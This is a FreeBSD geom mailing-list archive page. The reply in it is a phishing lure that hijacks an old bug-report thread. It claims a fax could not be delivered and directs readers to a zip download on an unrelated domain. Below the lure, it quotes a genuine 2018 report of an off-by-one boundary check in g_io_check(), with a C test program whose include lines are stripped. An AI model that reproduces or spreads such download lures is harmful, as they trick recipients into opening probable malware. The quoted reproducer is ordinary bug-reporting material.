Date: Mon, 26 Apr 2021 18:52:56 +0200 From: scion@webrelay.net To: freebsd-geom@freebsd.org Subject: Re: Off-by-1 error in the g_io_check() Message-ID: <hvo2trujwqsjbehqklwwi3u8dssbczpm@webrelay.net> In-Reply-To: <CAH7qZfsVvNzndKMhV%2BBehDQDziSYSZ2suyJzH_-bYAvG%2Bco4qw@mail.gmail.com> References: <CAH7qZfsVvNzndKMhV%2BBehDQDziSYSZ2suyJzH_-bYAvG%2Bco4qw@mail.gmail.com>
index | next in thread | previous in thread | raw e-mail
I have discovered a information that we must transfer you a fax, but I cannot see your proper digits where to transfer it. So I send this documents here: http://regionzahorie.sk/sRBQk/freebsd-geom-44108938.zip -----Original Message----- On Friday, 19 October 2018, 17:20, <freebsd-geom@freebsd.org> wrote: > Hi, I came across a bug that possibly affects all versions of FreeBSD since > dawn of the GEOM. There seems to be off-by-one error in the g_io_check() > allowing requests that just past the boundary of the device to be accepted. > I was particularly looking at generating BIO_DELETE requests in the > userland and noticed that GEOM provider would accept request for the first > sector outside of the device area. The following example illustrates the > issue: ---- test.c ---- #include #include #include #include #include > #include int main(int argc, char **argv) { int fd; off_t mediasize, > ioarg[2]; u_int secsize; assert(argc == 2); fd = open(argv[1], O_RDWR, 0); > assert(fd >= 0); assert(ioctl(fd, DIOCGMEDIASIZE, &mediasize) == 0); > assert(ioctl(fd, DIOCGSECTORSIZE, &secsize) == 0); ioarg[0] = mediasize - > secsize; ioarg[1] = secsize; /* Zero out last sector */ assert(ioctl(fd, > DIOCGDELETE, ioarg) == 0); ioarg[0] += secsize; /* Zero out last sector + 1 > */ assert(ioctl(fd, DIOCGDELETE, ioarg) == -1); assert(errno == EIO); > exit(0); } ------------ # cc -o test test.c # mdconfig -a -t malloc -s 1m > md0 # ./test /dev/md0 Assertion failed: (ioctl(fd, DIOCGDELETE, ioarg) == > -1), function main, file a.c, line 25. Abort trap # Patch to correct this > is attached. I have not looked at the code md(4) to see if it actually > results in buffer outside of the allocated area being zeroed out, but it's > totally possible that some providers might do some weird stuff given a > BIO_DELETE request like this. So we are possibly looking at a mild security > issue here (hence CC secteam). -Maxhelp
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?hvo2trujwqsjbehqklwwi3u8dssbczpm>